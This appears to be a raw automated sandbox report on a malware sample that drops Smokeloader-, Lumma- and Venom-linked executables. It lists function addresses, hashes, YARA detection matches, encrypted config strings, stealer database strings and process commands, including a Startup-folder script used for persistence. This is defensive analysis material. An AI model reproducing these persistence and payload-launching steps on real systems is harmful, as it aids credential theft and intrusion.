Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03083680 16_2_03083680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03065E97 16_2_03065E97
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308B5A0 16_2_0308B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03053DD0 16_2_03053DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03055DE0 16_2_03055DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0306EC06 16_2_0306EC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03070CB7 16_2_03070CB7
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D7CC0 19_2_6C8D7CC0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8F5CD4 19_2_6C8F5CD4
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D4CD0 19_2_6C8D4CD0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E1C21 19_2_6C8E1C21
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E4DE0 19_2_6C8E4DE0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E8D6E 19_2_6C8E8D6E
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D8E20 19_2_6C8D8E20
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E2890 19_2_6C8E2890
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E4930 19_2_6C8E4930
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D2B21 19_2_6C8D2B21
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8DD5D0 19_2_6C8DD5D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8DC010 19_2_6C8DC010
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D92D0 19_2_6C8D92D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E0210 19_2_6C8E0210
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_00568C7E 19_2_00568C7E
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_028E1EC8 19_2_028E1EC8
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_028E2640 19_2_028E2640
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_028E1EB8 19_2_028E1EB8
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF90B1 19_2_05FF90B1
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF077C 19_2_05FF077C
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF23C8 19_2_05FF23C8
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C864CD0 20_2_6C864CD0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C867CC0 20_2_6C867CC0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C885CD4 20_2_6C885CD4
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C871C21 20_2_6C871C21
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C874DE0 20_2_6C874DE0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C878D6E 20_2_6C878D6E
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C868E20 20_2_6C868E20
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C872890 20_2_6C872890
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C874930 20_2_6C874930
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C862B21 20_2_6C862B21
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C86D5D0 20_2_6C86D5D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C86C010 20_2_6C86C010
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C8692D0 20_2_6C8692D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C870210 20_2_6C870210
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_0251167A 20_2_0251167A
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\2D42.exe 4F7DB945B8F377AD28938F23F283E04454818FA0D9C4C692A30BCE2D12B66389
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\8EC7.exe AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\EF14.exe 505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259
Found potential string decryption / allocating functions
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 030593B0 appears 39 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 0305FCA0 appears 202 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: String function: 6C878D20 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: String function: 6C8E8D20 appears 35 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 1092
PE file contains more sections than normal
Source: EF14.exe.1.dr Static PE information: Number of sections : 12 > 10
PE file does not import any functions
Source: 8EC7.exe.1.dr Static PE information: No import functions for PE file found
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: No import functions for PE file found
Source: adjijwj.1.dr Static PE information: No import functions for PE file found
Source: 2D42.exe.1.dr Static PE information: No import functions for PE file found
Uses 32bit PE files
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0000001A.00000002.3222675712.0000000006020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000013.00000002.4107139559.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000014.00000002.3069005495.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001A.00000002.3108160771.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000014.00000002.3065926594.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: adjijwj.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: Section .text
Source: adjijwj.1.dr Static PE information: Section .text
Source: 19.2.vm.exe.4e40000.1.raw.unpack, Settings.cs Base64 encoded string: 'uv876R64GyPQROS6Pcq+tT2rujm6QhOA2jKz3+72iK0vssZ7tRu9W1NfcaQ5yk3K4leNInPIlyvrm/sWNe6YUSzW9MnjujJ8wA3fVO6kqY4=', 'tBbcnyqIuxWvE/Aa008Phm66l0gx08l3V72N0uezc1BvWV+aVFh/K2LjDSmziiX4d1we58iQkTKHp5hlA6J3ArDNNUTcH31I6D+8IIWmVEXPfFcr7grctRvtFWbh8/WW', 'vlrU2ttL4QCN9XP+miA1iO2Zi1Qo5KKeTfPUgLmvXsgl1b/ZXBNeN/RykY5FXUbGAFb/hcKmdGI2lxq9dyDNOg==', 'jajjt4fLdfeySHLjOUN+WU7vKFN/tv6flHwdN63QqNLvwdiPerPjqi8pJYhlDxutlcONhE6KmVeSyHLXzp1X0ivMLOia3ounzEFu+OufC35pSXOr0AgnutA9Hm2WMXLR5SrKu9Ep2d9bPbB7jBc3VXBVjkPHm+BjMjy64M6HAubGgc8bZ4x9RmkpsgBYOzwKBmFDp7rKGTxhnrnem674/IV8HtJhbUivlbelAfQbN92NlB/IZHSII0WCgZyWHfjXPeAh7ScQvm1glooPfQyjEFujB5EgoLg8/Q+UZ9OyLZY=', '/3HMGRMO5mfkdekqR4Zafv717iumQMzpVLF6A9pHRaBxVKyvDxb55/QnfojY3GM4MZFgEKqs9lZExa/oUaQFQQ==', 'l439UHfThXI7Tvv4tLPkRk4LgJxneAQ3SRt6rij4oIvNCNJh0dGkWYtmoBCaQASy+UxakX8pDIHBYYo6I0jgiA==', 'H36CdwWLE8twm6SaEVP4wCqEXttEdFNm1/TG0CIbxJ6QscVZsS9u+iDyyURaAEJfbnGnfKxPezH51YuRdKUEGw==', 'X+lWHHhlIbk/ipVH2n6hOx1tpa9s2D5Jo0CwgGIgu5WBtb6gmcLOKhvfywa/wW2BsaqNON/3eZUEUOX0Z6TMoQ=='
Source: 26.2.vm.exe.4e30000.1.raw.unpack, Settings.cs Base64 encoded string: 'uv876R64GyPQROS6Pcq+tT2rujm6QhOA2jKz3+72iK0vssZ7tRu9W1NfcaQ5yk3K4leNInPIlyvrm/sWNe6YUSzW9MnjujJ8wA3fVO6kqY4=', 'tBbcnyqIuxWvE/Aa008Phm66l0gx08l3V72N0uezc1BvWV+aVFh/K2LjDSmziiX4d1we58iQkTKHp5hlA6J3ArDNNUTcH31I6D+8IIWmVEXPfFcr7grctRvtFWbh8/WW', 'vlrU2ttL4QCN9XP+miA1iO2Zi1Qo5KKeTfPUgLmvXsgl1b/ZXBNeN/RykY5FXUbGAFb/hcKmdGI2lxq9dyDNOg==', 'jajjt4fLdfeySHLjOUN+WU7vKFN/tv6flHwdN63QqNLvwdiPerPjqi8pJYhlDxutlcONhE6KmVeSyHLXzp1X0ivMLOia3ounzEFu+OufC35pSXOr0AgnutA9Hm2WMXLR5SrKu9Ep2d9bPbB7jBc3VXBVjkPHm+BjMjy64M6HAubGgc8bZ4x9RmkpsgBYOzwKBmFDp7rKGTxhnrnem674/IV8HtJhbUivlbelAfQbN92NlB/IZHSII0WCgZyWHfjXPeAh7ScQvm1glooPfQyjEFujB5EgoLg8/Q+UZ9OyLZY=', '/3HMGRMO5mfkdekqR4Zafv717iumQMzpVLF6A9pHRaBxVKyvDxb55/QnfojY3GM4MZFgEKqs9lZExa/oUaQFQQ==', 'l439UHfThXI7Tvv4tLPkRk4LgJxneAQ3SRt6rij4oIvNCNJh0dGkWYtmoBCaQASy+UxakX8pDIHBYYo6I0jgiA==', 'H36CdwWLE8twm6SaEVP4wCqEXttEdFNm1/TG0CIbxJ6QscVZsS9u+iDyyURaAEJfbnGnfKxPezH51YuRdKUEGw==', 'X+lWHHhlIbk/ipVH2n6hOx1tpa9s2D5Jo0CwgGIgu5WBtb6gmcLOKhvfywa/wW2BsaqNON/3eZUEUOX0Z6TMoQ=='
Source: 2D42.exe.1.dr, PowerShellLoader.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2D42.exe.1.dr, PowerShellLoader.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 26.2.vm.exe.4e30000.1.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.vm.exe.4e30000.1.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 19.2.vm.exe.4e40000.1.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.2.vm.exe.4e40000.1.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@40/44@12/16
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64166F5B0 LookupPrivilegeValueA,AdjustTokenPrivileges,OpenProcessToken, 7_2_00007FF64166F5B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03079C80 CoCreateInstance, 16_2_03079C80
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\adjijwj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2736:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Mutant created: \Sessions\1\BaseNamedObjects\8yUscnjrUY
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2344:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Mutant created: \Sessions\1\BaseNamedObjects\aqswvfsywrpgi
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2004
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5724
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8EC7.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe File opened: C:\Windows\system32\0dac501b8d19111c7bce9a7ce47575ef7a8b648351979b7f5b84fa7f76790c54AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: lm.exe, 00000014.00000003.2662227068.0000000003129000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2658565085.0000000003205000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Virustotal: Detection: 58%
Source: EF14.exe String found in binary or memory: .1h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= depgithub.com/edsrzf/mmap-gov1.1.0h1:6EUwBLQ/Mcr1EYLE4Tn1VdW1A4ckqCQWZBw8Hr0kjpQ= depgithub.com/filecoin-project/go-addressv1.1.0h1:ofdtUtEsNxkIxkDw67ecSmvtzaVSdcea4boAmLbnHfE= depgithub.com/filecoin-pr
Source: EF14.exe String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: EF14.exe String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: EF14.exe String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
Source: EF14.exe String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
Source: EF14.exe String found in binary or memory: 4z/Oni01D2Gm1Du/vo7/ADDErEP0DNhYaqvcF1p/cFSLGEgObC3rn8jqKTnzuNp4wHD4+XFMSIRNAIIzjOX/KZNc3PRk/O0O7ASRoZctsH2Bd1nJGgtmCymXVz7Rpdu4Nm50g77Trg6nTXIg1ur3ovBmkCw7pL+BrZx45wBgh/hLl9XRe424S9Lh2ZXPjbs4697O00XFV32GKA29/QTxEtCdWE4CQix59dE/Tc+MNcfWwyxJV1ePU1UKPn9EjTGGdTeh
Source: EF14.exe String found in binary or memory: &github.com/filecoin-project/go-address
Source: EF14.exe String found in binary or memory: net/addrselect.go
Source: EF14.exe String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.encode
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.NewFromBytes
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.newAddress
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.Payload
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.Protocol
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.decode
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Checksum
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.base32decode
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.hash
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalBinary
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.ValidateChecksum
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.init.1
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalBinary
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalBinary
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Bytes
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).String
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalJSON
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.init
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.Bytes
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.init.func1
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.init.0
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.String
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.init.func2
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalJSON
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalJSON
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.NewSecp256k1Address
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.NewIDAddress
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.NewActorAddress
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.addressHash
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.NewDelegatedAddress
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.NewBLSAddress
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/constants.go
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: unknown Process created: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe "C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\adjijwj C:\Users\user\AppData\Roaming\adjijwj
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe C:\Users\user\AppData\Local\Temp\8EC7.exe
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EF14.exe C:\Users\user\AppData\Local\Temp\EF14.exe
